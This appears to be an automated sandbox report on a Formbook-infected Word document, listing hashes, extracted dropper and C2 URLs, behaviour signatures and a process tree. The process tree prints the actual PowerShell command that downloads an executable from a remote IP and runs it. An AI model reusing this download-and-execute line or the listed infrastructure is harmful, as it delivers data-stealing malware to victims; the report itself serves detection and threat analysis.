Analysis

  • max time kernel
    156s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    22-09-2021 19:04

General

  • Target

    ORDER QUOTE.docx

  • Size

    10KB

  • MD5

    eee70c12ab889fd6173de81fbc9a6817

  • SHA1

    673a841da220e5ba72e5f30d1d566569595ed352

  • SHA256

    7c41d53d6dd4f2979bfcdea462feef025b2f31cf55644f927ece5f4699a1b7a9

  • SHA512

    7647f0d5adcd468a6cbae4900ecb2887de0a0f89ba25893379f905f04b7b9ee0fa89af755c8cb1db8e4d613f11a8f9f80334de3e784677d1fac1ad51cc9db8d7

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://198.46.199.161/joo/vbc.exe

Extracted

Family

formbook

Version

4.1

Campaign

m8g0

C2

http://www.psicologarenatacruz.com/m8g0/

Decoy

trypapaya.pro

instructorcornernet.com

techadvisorsfl.com

raunnan.com

filestune.com

learnitanywhereskills.com

beaullife.com

getcovidwear.com

tkrbeautyinstitut.com

lisaphamkhai.com

iconicdds.com

ksoopawlas.com

testosteron.store

jctaketwo.com

awexz.online

onlinening.com

steelwerkschicago.com

lukakordic.com

expertsofcoaching.com

dashcca.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Formbook Payload 3 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Abuses OpenXML format to download file from external location 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1204
    • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ORDER QUOTE.docx"
      2⤵
      • Abuses OpenXML format to download file from external location
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1640
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        3⤵
          PID:1796
      • C:\Windows\SysWOW64\help.exe
        "C:\Windows\SysWOW64\help.exe"
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:828
        • C:\Windows\SysWOW64\cmd.exe
          /c del "C:\Users\Admin\AppData\Local\Temp\vbc.exe"
          3⤵
            PID:1564
      • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
        1⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Launches Equation Editor
        • Suspicious use of WriteProcessMemory
        PID:524
        • C:\Users\Public\regasm.exe
          "C:\Users\Public\regasm.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:784
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c powershell "(New-Object System.Net.WebClient).DownloadFile('http://198.46.199.161/joo/vbc.exe', (Join-Path -Path $env:Temp -ChildPath 'vbc.exe'))" & powershell "Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'vbc.exe')" & exit
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:556
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell "(New-Object System.Net.WebClient).DownloadFile('http://198.46.199.161/joo/vbc.exe', (Join-Path -Path $env:Temp -ChildPath 'vbc.exe'))"
              4⤵
              • Blocklisted process makes network request
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1532
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell "Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'vbc.exe')"
              4⤵
              • Loads dropped DLL
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2008
              • C:\Users\Admin\AppData\Local\Temp\vbc.exe
                "C:\Users\Admin\AppData\Local\Temp\vbc.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1352
                • C:\Users\Admin\AppData\Local\Temp\vbc.exe
                  "C:\Users\Admin\AppData\Local\Temp\vbc.exe"
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1548

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scripting

      1
      T1064

      Exploitation for Client Execution

      1
      T1203

      Defense Evasion

      Scripting

      1
      T1064

      Modify Registry

      1
      T1112

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\vbc.exe
        MD5

        3dac10541270990e15c8742b0cd6f153

        SHA1

        ed5c87e500c51e055ddb9160929a3dac51d3a393

        SHA256

        744e1148859c05acf0cb4aac84f5687c5106268c30db72a31529b67695028a5f

        SHA512

        66f408fefd562558c96749981784157ac480895867e6612a410f8ebad6af05547e0fdae4431f1ddb136d2086d7acf2927ccff0d60b1adc44144c8bf1507589d1

      • C:\Users\Admin\AppData\Local\Temp\vbc.exe
        MD5

        3dac10541270990e15c8742b0cd6f153

        SHA1

        ed5c87e500c51e055ddb9160929a3dac51d3a393

        SHA256

        744e1148859c05acf0cb4aac84f5687c5106268c30db72a31529b67695028a5f

        SHA512

        66f408fefd562558c96749981784157ac480895867e6612a410f8ebad6af05547e0fdae4431f1ddb136d2086d7acf2927ccff0d60b1adc44144c8bf1507589d1

      • C:\Users\Admin\AppData\Local\Temp\vbc.exe
        MD5

        3dac10541270990e15c8742b0cd6f153

        SHA1

        ed5c87e500c51e055ddb9160929a3dac51d3a393

        SHA256

        744e1148859c05acf0cb4aac84f5687c5106268c30db72a31529b67695028a5f

        SHA512

        66f408fefd562558c96749981784157ac480895867e6612a410f8ebad6af05547e0fdae4431f1ddb136d2086d7acf2927ccff0d60b1adc44144c8bf1507589d1

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        MD5

        6611b592c8f528ce0e0d4680ac8b193e

        SHA1

        652735fff820d48689a89808e7bb6622005f6756

        SHA256

        df3a7ad793859662a4b91a5fdf49f04856934e5999cfa344dc9cc4e2886f2d9c

        SHA512

        39751fed18c114c151ba65a5d92eff40f409201904bf3263731bd61ba2879836a95a171c2f6c85cb03632162a72bb1d87f92b00d547c059de0231f463f2b22d5

      • C:\Users\Public\regasm.exe
        MD5

        7f06feab552ff5b4b5ea9c0c08a50982

        SHA1

        fec42fd952353328a01939c949ccb7031be50530

        SHA256

        053e45fb6090b18e9a8ff0a8c24fd2d77eca4057539b1add95e03c38be35b3a0

        SHA512

        9c5877c7851e8d6b000c729948b330ab66e69a18205b3ac5de70b4907360f3fb4541e6745312f7deb08f1a046fb2470e13ab9ca326e0e2f478819ecaa47e9be0

      • \Users\Admin\AppData\Local\Temp\vbc.exe
        MD5

        3dac10541270990e15c8742b0cd6f153

        SHA1

        ed5c87e500c51e055ddb9160929a3dac51d3a393

        SHA256

        744e1148859c05acf0cb4aac84f5687c5106268c30db72a31529b67695028a5f

        SHA512

        66f408fefd562558c96749981784157ac480895867e6612a410f8ebad6af05547e0fdae4431f1ddb136d2086d7acf2927ccff0d60b1adc44144c8bf1507589d1

      • \Users\Admin\AppData\Local\Temp\vbc.exe
        MD5

        3dac10541270990e15c8742b0cd6f153

        SHA1

        ed5c87e500c51e055ddb9160929a3dac51d3a393

        SHA256

        744e1148859c05acf0cb4aac84f5687c5106268c30db72a31529b67695028a5f

        SHA512

        66f408fefd562558c96749981784157ac480895867e6612a410f8ebad6af05547e0fdae4431f1ddb136d2086d7acf2927ccff0d60b1adc44144c8bf1507589d1

      • \Users\Public\regasm.exe
        MD5

        7f06feab552ff5b4b5ea9c0c08a50982

        SHA1

        fec42fd952353328a01939c949ccb7031be50530

        SHA256

        053e45fb6090b18e9a8ff0a8c24fd2d77eca4057539b1add95e03c38be35b3a0

        SHA512

        9c5877c7851e8d6b000c729948b330ab66e69a18205b3ac5de70b4907360f3fb4541e6745312f7deb08f1a046fb2470e13ab9ca326e0e2f478819ecaa47e9be0

      • \Users\Public\regasm.exe
        MD5

        7f06feab552ff5b4b5ea9c0c08a50982

        SHA1

        fec42fd952353328a01939c949ccb7031be50530

        SHA256

        053e45fb6090b18e9a8ff0a8c24fd2d77eca4057539b1add95e03c38be35b3a0

        SHA512

        9c5877c7851e8d6b000c729948b330ab66e69a18205b3ac5de70b4907360f3fb4541e6745312f7deb08f1a046fb2470e13ab9ca326e0e2f478819ecaa47e9be0

      • memory/556-65-0x0000000000000000-mapping.dmp
      • memory/784-61-0x0000000000000000-mapping.dmp
      • memory/828-98-0x0000000000350000-0x0000000000356000-memory.dmp
        Filesize

        24KB

      • memory/828-97-0x0000000000000000-mapping.dmp
      • memory/828-101-0x0000000000950000-0x0000000000C53000-memory.dmp
        Filesize

        3.0MB

      • memory/828-102-0x0000000000400000-0x0000000000494000-memory.dmp
        Filesize

        592KB

      • memory/828-99-0x0000000000080000-0x00000000000AF000-memory.dmp
        Filesize

        188KB

      • memory/1204-105-0x000007FEF5D70000-0x000007FEF5EB3000-memory.dmp
        Filesize

        1.3MB

      • memory/1204-96-0x0000000005F90000-0x000000000604D000-memory.dmp
        Filesize

        756KB

      • memory/1204-104-0x0000000006180000-0x00000000062D4000-memory.dmp
        Filesize

        1.3MB

      • memory/1204-106-0x000007FF15CE0000-0x000007FF15CEA000-memory.dmp
        Filesize

        40KB

      • memory/1352-89-0x0000000002050000-0x0000000002082000-memory.dmp
        Filesize

        200KB

      • memory/1352-86-0x0000000001FB0000-0x0000000001FB1000-memory.dmp
        Filesize

        4KB

      • memory/1352-84-0x00000000000B0000-0x00000000000B1000-memory.dmp
        Filesize

        4KB

      • memory/1352-87-0x0000000000790000-0x00000000007AD000-memory.dmp
        Filesize

        116KB

      • memory/1352-88-0x0000000004FA0000-0x0000000005001000-memory.dmp
        Filesize

        388KB

      • memory/1352-82-0x0000000000000000-mapping.dmp
      • memory/1532-69-0x0000000002390000-0x0000000002FDA000-memory.dmp
        Filesize

        12.3MB

      • memory/1532-71-0x0000000004B20000-0x0000000005171000-memory.dmp
        Filesize

        6.3MB

      • memory/1532-66-0x0000000000000000-mapping.dmp
      • memory/1532-70-0x0000000002390000-0x0000000002FDA000-memory.dmp
        Filesize

        12.3MB

      • memory/1532-68-0x0000000002390000-0x0000000002FDA000-memory.dmp
        Filesize

        12.3MB

      • memory/1548-95-0x0000000000160000-0x0000000000175000-memory.dmp
        Filesize

        84KB

      • memory/1548-94-0x0000000000AA0000-0x0000000000DA3000-memory.dmp
        Filesize

        3.0MB

      • memory/1548-92-0x000000000041F1B0-mapping.dmp
      • memory/1548-91-0x0000000000400000-0x000000000042F000-memory.dmp
        Filesize

        188KB

      • memory/1564-100-0x0000000000000000-mapping.dmp
      • memory/1640-55-0x00000000707E1000-0x00000000707E3000-memory.dmp
        Filesize

        8KB

      • memory/1640-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

      • memory/1640-57-0x0000000076961000-0x0000000076963000-memory.dmp
        Filesize

        8KB

      • memory/1640-54-0x0000000072D61000-0x0000000072D64000-memory.dmp
        Filesize

        12KB

      • memory/1640-103-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

      • memory/1796-64-0x000007FEFC271000-0x000007FEFC273000-memory.dmp
        Filesize

        8KB

      • memory/1796-63-0x0000000000000000-mapping.dmp
      • memory/2008-77-0x00000000023B0000-0x00000000023B1000-memory.dmp
        Filesize

        4KB

      • memory/2008-78-0x00000000023B1000-0x00000000023B2000-memory.dmp
        Filesize

        4KB

      • memory/2008-79-0x00000000023B2000-0x00000000023B4000-memory.dmp
        Filesize

        8KB

      • memory/2008-72-0x0000000000000000-mapping.dmp
      • memory/2008-76-0x0000000004E00000-0x0000000005451000-memory.dmp
        Filesize

        6.3MB

      • memory/2008-75-0x0000000004B50000-0x0000000004C64000-memory.dmp
        Filesize

        1.1MB